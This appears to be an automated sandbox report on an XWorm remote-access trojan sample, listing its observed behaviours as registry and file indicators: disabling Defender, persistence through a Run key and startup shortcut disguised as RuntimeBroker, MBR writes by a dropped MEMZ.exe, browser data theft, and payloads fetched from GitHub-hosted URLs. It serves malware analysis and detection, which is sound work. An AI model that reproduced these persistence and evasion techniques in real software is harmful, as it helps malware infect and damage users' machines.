Malware Analysis Report

2024-11-16 13:30

Sample ID 240621-vavw7ssbjp
Target ImageLogger.exe
SHA256 5175b805ea8db533ac0b0153899804be3dd8b5151185ef5ef4614ce01f8acbba
Tags
xworm bootkit execution persistence ransomware rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5175b805ea8db533ac0b0153899804be3dd8b5151185ef5ef4614ce01f8acbba

Threat Level: Known bad

The file ImageLogger.exe was found to be: Known bad.

Malicious Activity Summary

xworm bootkit execution persistence ransomware rat spyware stealer trojan

Contains code to disable Windows Defender

Xworm

Detect Xworm Payload

Xworm family

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks computer location settings

Reads user/profile data of web browsers

Drops startup file

Loads dropped DLL

Writes to the Master Boot Record (MBR)

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Drops desktop.ini file(s)

Enumerates connected drives

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Uses Volume Shadow Copy service COM API

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Modifies registry class

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Scheduled Task/Job: Scheduled Task

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-21 16:47

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm family

xworm

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-21 16:47

Reported

2024-06-21 17:11

Platform

win10v2004-20240611-en

Max time kernel

749s

Max time network

760s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\MEMZ.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\MEMZ.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker.exe" C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2080292272-204036150-2159171770-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\U: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\M: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\P: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\N: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\S: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\T: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\V: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\K: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\L: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\R: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\J: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\H: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SYSTEM32\MsiExec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Downloads\MEMZ.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1424 set thread context of 1120 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\dotnet\host\fxr\6.0.27\hostfxr.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI239F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI23EF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3238.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3277.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000000000000187f58750000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133634628102897978" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F\SourceList C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\497A7447E2AFEB24ABA9F5BC5DC4D53F C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Rev = "0" C:\Windows\explorer.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\explorer.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A1A5B816FCD50AC5256C8FA1FB47CF92 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Windows\explorer.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
